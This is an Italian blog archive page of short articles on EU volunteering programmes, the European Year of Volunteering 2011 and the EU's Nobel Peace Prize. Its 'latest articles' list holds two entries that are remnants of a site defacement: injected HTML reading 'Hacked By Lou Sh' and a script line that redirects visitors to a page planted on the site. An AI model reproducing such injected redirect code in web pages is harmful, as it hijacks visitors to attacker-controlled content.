EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Volontariato

Volontariato


Volontariato

it

“L’opera umana più bella è essere utile al prossimo”, scriveva Sofocle: migliaia di europei lavorano già come volontari nel mondo intero, assistendo vittime di catastrofi e crisi; molti altri sarebbero pronti a partire se ne avessero la possibilità.

La Commissione europea ha presentato le linee guida del programma EU Aid Volunteers, previsto dal Trattato di Lisbona, rivolto a quanti desiderano rimboccarsi le maniche per intervenire in prima persona nei luoghi colpiti da catastrofi. L’obiettivo generale è quello di fornire opportunità di (...)

it

La Georgieva ha fatto questa richiesta da Cipro, dove si trovava per partecipare ad un importante incontro di esperti internazionali riguardo le pratiche di volontariato, i quali cooperano in maniera attiva con la Protezione Civile e compiono vari interventi umanitari. All'intervento ha partecipato anche Eleni Mavrou, Ministro degli Interni della Repubblica di Cipro, che ha fatto trasparire una certa preoccupazione ma anche un cauto ottimismo verso l'operazione. Non sarà sicuramente facile ingaggiare nuove reclute visto la delicatezza della situazione di alcuni stati menzionati dal commisario Ue, ma l'Unione europea spera che questo intervento possa aver aiutato in tal senso.

La richiesta della Georgieva si articola in sei punti principali. Il primo si apre con un elogio nei confronti di Cipro, paese a suo dire sempre attivo nelle questioni umanitarie, anche a causa dei trascorsi che l’hanno visto, purtroppo, protagonista di episodi più o meno cruenti. E proprio a (...)

it

La possibilità di prestare assistenza finanziaria ai paesi terzi, il rafforzamento del ruolo del cittadino europeo e il riconoscimento dei suoi diritti attraverso l’istituzione di una Carta a lui interamente dedicata, l’avvio del progetto Europa 2020 volto a promuovere lo sviluppo dell’intero Paese, la lotta contro il terrorismo, la garanzia di assistenza in caso di calamità naturali e il potenziamento del potere del Parlamento: sono queste alcune delle ragioni che hanno portato l’Unione Europea a ricevere il Premio Nobel per la pace 2012.

I meriti dell’Unione europea

Lo scorso 12 ottobre all’Unione europea è stato assegnato il Premio Nobel per la pace 2012. Si tratta di un riconoscimento fondamentale per tutti i cittadini europei, un premio per cui non occorre nascondere il proprio orgoglio. L’Europa sta vivendo da tempo un periodo (...)

it

Dal 2014 nascerà la Protezione Civile Europea: il progetto, nato da un’idea della Commissione Europea, intende far partire 10.000 volontari per dare aiuto nelle zone colpite da catastrofi ambientali e umanitarie.

L’iniziativa “Ue Aid Volunteers” si pone come obiettivo principale quello di aiutare le popolazioni colpite da qualsiasi tipo di catastrofe attraverso la collaborazione tra l’iniziativa della Commissione e le varie Ong. Le organizzazioni umanitarie infatti, necessitano sempre più di volontari ben (...)

it

L’European Youth Forum (YFJ) è un’organizzazione internazionale che riunisce i Consigli della gioventù nazionali e le organizzazioni internazionali della gioventù provenienti da tutta Europa e si occupa della promozione degli interessi dei giovani. Il Forum e l’Alleanza dell’Anno Europeo del volontariato 2011 (EYV), assieme ad altri partner e stakeholder, hanno permesso la realizzazione di un documento molto importante, la Carta Europea dei Diritti e delle Responsabilità del Volontario. La Carta, articolata in diverse sezioni, definisce il significato dell’essere volontario, fornitore di volontariato e dell’attività di volontariato stessa.

Lo status di volontario richiede un suo riconoscimento giuridico; la Carta definisce i diritti del volontario e tutte le norme ambientali e legali che devono essere rispettate nelle attività di volontariato, nonché esprime con chiarezza i doveri e i diritti dei “volounteering providers”, i (...)

it

Conoscere persone provenienti da molti Paesi e diversi contesti, vivere un'esperienza di volontariato internazionale, avvicinarsi a culture e popoli lontani. Queste sono solo alcune delle opportunità offerte dai campi di volontariato. Il motto è "deeds not words", fatti non parole.

La crisi economica colpisce duramente anche il mondo del volontariato, rendendo a volte proibitive o snaturando le esperienze low cost organizzate dallo SCI (Servizio Civile Internazionale). La deriva da evitare è che il terzo settore smetta di fungere da strumento, trasformandosi in un fine; (...)

it

Nel 2011, in occasione dell’Anno europeo delle attività di volontariato, è stato creato un portale indirizzato a promuovere tutto ciò che riguarda il cosiddetto Terzo settore, il volontariato appunto. “Volontarioineuropa.eu”, operativo dal luglio 2011, è un progetto pensato e voluto con l’obiettivo di mettere in contatto associazioni, organizzazioni e persone impegnate in attività di assistenza sociale, solidarietà, tutela dell’ambiente e delle fasce più bisognose della popolazione italiana ed europea.

Al fine anche di incrementare il senso d’appartenenza a una comunità vasta e variegata quale è l’Unione Europea, il Parlamento Europeo insieme alla Commissione Europea e alla Presidenza del Consiglio dei Ministri italiano– Dipartimento per le politiche europee, ha dato vita a questo spazio in cui è (...)

it

Creare nuovi spazi per la partecipazione giovanile alla vita pubblica è la priorità dell’associazione Giosef Italy, da sempre impegnata nella realizzazione di attività e progetti che incoraggiano la partecipazione giovanile in ogni sua forma. Si tratta di un’organizzazione presente su tutto il territorio nazionale e suddivisa in diverse sedi locali ciascuna delle quali ha la libertà di agire in maniera autonoma, usufruendo degli strumenti più consoni alla propria realtà locale. È il caso della Giosef di Caserta, che ha proposto la partecipazione dei giovani ad un’interessante progetto 1.1 Youth in Action: uno scambio culturale, il “Bridge between generation”, che si terrà a Marzo in Bulgaria, precisamente a Karlovo e al quale parteciperanno l’Italia, la Spagna, il Portogallo, la Lituania, la Slovacchia e l’Ungheria.

La “Youth in Action” (Gioventù in azione) è un programma di finanziamento della Commissione europea che ha come obiettivo quello di favorire il processo di integrazione giovanile e che dispone di un budget di 885 milioni di euro, stanziato per sette anni. Un progetto che sostiene attivamente la (...)

it

In occasione dell'anno europeo del Volontariato, fioriscono le iniziative volte al potenziamento della rete di giovani volontari europei attivi nel mondo. Si collocano all'interno di questo scenario anche i due progetti promossi dall’associazione ARCS, ONG dell'organizzazione ARCI (Associazione Ricreativa e Culturale Italiana).

L’ARCS, Associazione Ricreativa per la Cultura Solidale, nasce nel 1985 per volontà dell’organizzazione non governativa ARCI di vita, all’interno della sua struttura, ad un nuovo settore, volto all’ampliamento della partecipazione civile nel campo della cooperazione solidale internazionale. Sono (...)

it

"Oggi l'Unione Europea conta 100 milioni di volontari che contribuiscono a migliorare l'Europa e il mondo. L'Anno europeo del volontariato 2011 evidenzia i loro successi, incoraggia altri ad unirsi a loro e aiuta i volontari e le organizzazioni di volontariato a fare ancora di più." Queste sono le parole di Viviane Reding, Vicepresidente della Commissione e Commissaria responsabile per la Giustizia, i diritti fondamentali e la cittadinanza, che esalta le innovazioni apportate e che riassumono l’importanza e l’entità dei cambiamenti.

In occasione dell’Anno europeo del volontariato 2011, la Comunicazione della Commissione sulle politiche dell’UE e il volontariato presenta una serie di cambiamenti che contribuiranno a promuovere le attività di volontariato nell’Unione europea. Questo programma di sviluppo e di ampliamento (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France